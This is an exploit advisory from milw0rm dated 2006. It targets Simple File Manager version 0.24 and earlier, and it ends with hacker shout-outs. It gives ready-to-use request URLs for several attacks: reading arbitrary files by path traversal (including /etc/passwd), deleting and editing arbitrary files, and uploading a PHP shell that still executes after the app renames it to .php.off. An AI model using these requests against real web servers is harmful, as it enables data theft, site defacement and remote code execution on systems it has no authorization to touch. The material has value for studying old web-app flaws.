/*******************************************\ | flame vrs Simple File Manager <=0.24=> | | http://onedotoh.sourceforge.net/ | | Various Vulnerbilities Including: | \*******************************************/ /+++++++++++++++++++++++++++++++++++++++++++\ | Using the scripts supplied by the webapp: | | Reading of Arbitrary files | | Deletion of Arbitrary files | | Modification of Arbitrary files | | Creation of Arbitrary files | | Uploading of Malicious files | \+++++++++++++++++++++++++++++++++++++++++++/ /&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\ | Simple File Manager (SFM) is a web based | | file management utility. | | It is designed to be used by those that | | don't want to use ftp or SHOULD NOT use | | ftp. It can be dropped into a specific | | directory and give access to that | | directory as well as any directory below | | it, including those created by SFM. It | | can be placed in a specific directory and | | configured to give access to other | | directories outside of its location | | (centralized). SFM gives its user upload, | | rename, delete, directory creation as | | well as directory navigation (within its | | tree limits), as well as Create New File; | | it also includes an image viewer, text | | viewer and mime type downloading. | \&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/ | ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ | | Thats the description from the author...| | Which basically outlines all of its | | vulnerbilities. | \_________________________________________/ /=========================================================================================================================\ ############################ .:Reading of Arbitrary Files:. ############################################################### # fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2 # # EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 # ########################################################################################################################### \=========================================================================================================================/ /=========================================================================================================================\ ############################ .:Deletion of Arbirary Files:. ############################################################### # fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext= # # EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext= # ########################################################################################################################### \=========================================================================================================================/ /=========================================================================================================================\ ############################# .:Modification of Arbitrary Files:. ######################################################### # fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext= # # EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext= # ########################################################################################################################### \=========================================================================================================================/ /=========================================================================================================================\ ############################# .:Creation of Arbitrary Files:. ############################################################# # START LOCAL HTML FILE: #
Filename:
# END LOCAL HTML FILE # ########################################################################################################################### # Note... various characters are escaped. And by default all .php files will be renamed to file.php.off # # Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files) # ########################################################################################################################### \=========================================================================================================================/ /=========================================================================================================================\ ############################## .: Uploading of Malicious Files:. ########################################################## # START LOCAL HTML FILE: #
# END LOCAL HTML FILE # ########################################################################################################################### # Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it# # will execute... EG: http://www.site.com/file/phpshell.php.off # ########################################################################################################################### \=========================================================================================================================/ /++++++++++++++++++++++++++++\ | Be good, and dont be too | | hopeful about finding | | yourself a gibbon running | | this script. It predates | | my #999999 hair. | \++++++++++++++++++++++++++++/ /{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\ |---------------------------------------| | <&bk> stfu flame | | <~PhaZe_One> no fame without flame | | <+c|p> I love you flame | | <%emc2> flame wishes death upon you | | are you emo flame? | | <&[myg0t]40> flame dont be mad | | *~str0ke humps flame's leg | | <&ZoNe_VoRTeX> <3 flame | |---------------------------------------| \{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/ # milw0rm.com [2006-12-02]